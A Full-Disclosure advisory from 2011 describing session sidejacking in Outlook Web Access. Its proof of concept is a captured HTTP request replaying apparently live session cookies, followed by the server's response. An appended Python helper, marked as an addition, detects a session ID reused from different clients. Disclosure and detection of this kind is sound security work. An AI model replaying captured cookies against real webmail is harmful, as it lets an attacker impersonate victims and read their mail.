
[Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability



==============================================================================

                      Microsoft Outlook Web Access Session
sidejacking/Session Replay Vulnerability

===============================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh Kumar Mani Tripathi

# email informationhacker08@xxxxxxxxx


# Credit by Asheesh Anaconda

#Date 25th Oct 2011


#Product  Outlook Web Access 8.2.254.0



#Vulnerability
SideJacking is the process of sniffing web cookies and then replaying them to
clone another user's web session. With the cloned session, the attacker can
exploit the victim's previously established access to the site.

#Impact
This allows an attacker who can read the network traffic to intercept all the
data submitted to the server and every web page viewed by the client. Because
that data includes the session cookie, the attacker can impersonate the victim
even though the password itself is never compromised.



#Proof of concept


========================================================================================================================

                                                          Request
========================================================================================================================
GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://xxxwebmail.xxx.xxx/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3


========================================================================================================================

                                                          Response
========================================================================================================================

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 58676
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-OWA-Version: 8.2.254.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Tue, 25 Oct 2011 15:00:01 GMT

#If you have any questions, comments, or concerns, feel free to contact me.
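An added example, not part of the advisory: a small Python helper that pulls the cookies out of a raw request in the shape of the capture above and flags a sessionid that is presented from more than one client IP/User-Agent binding, which is what a replayed cookie looks like from the server side. The host name, client IPs, user agents and the cadata value are constructed placeholders; only the sessionid and UserContext values are taken from the capture.

```python
from collections import defaultdict

# Constructed sample request in the shape of the advisory's capture.
# Host and cadata are placeholders; sessionid/UserContext come from the capture.
RAW_REQUEST = (
    "GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1\r\n"
    "Host: webmail.example.test\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n"
    "Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000; "
    "cadata=\"EXAMPLE\"; UserContext=e8997d6036554ada88a62dc9f2cf65d3\r\n\r\n"
)

# Constructed access-log style events: (sessionid, client_ip, user_agent).
# S1 is later presented from a second client: the replay pattern.
SAMPLE_EVENTS = [
    ("S1", "10.0.0.5", "UA-A"),
    ("S1", "10.0.0.5", "UA-A"),
    ("S1", "192.0.2.9", "UA-B"),
    ("S2", "10.0.0.7", "UA-A"),
]


def parse_cookies(raw_request: str) -> dict:
    """Return the Cookie header of a raw HTTP/1.1 request as a name->value dict."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    cookies = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")     # first colon only; values may contain ':'
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key:
                cookies[key] = val.strip('"')    # cadata is quoted in the capture
    return cookies


def find_replayed_sessions(events: list) -> dict:
    """Map each sessionid seen from more than one (ip, user_agent) binding to
    the sorted list of bindings; a single session should not change clients."""
    bindings = defaultdict(set)
    for sid, ip, ua in events:
        bindings[sid].add((ip, ua))
    return {sid: sorted(b) for sid, b in bindings.items() if len(b) > 1}


if __name__ == "__main__":
    print(parse_cookies(RAW_REQUEST))
    print(find_replayed_sessions(SAMPLE_EVENTS))
```

Binding a session to its first-seen client is a heuristic: proxies and mobile clients change addresses legitimately, so treat a hit as a signal to force re-authentication, not as proof on its own.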
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/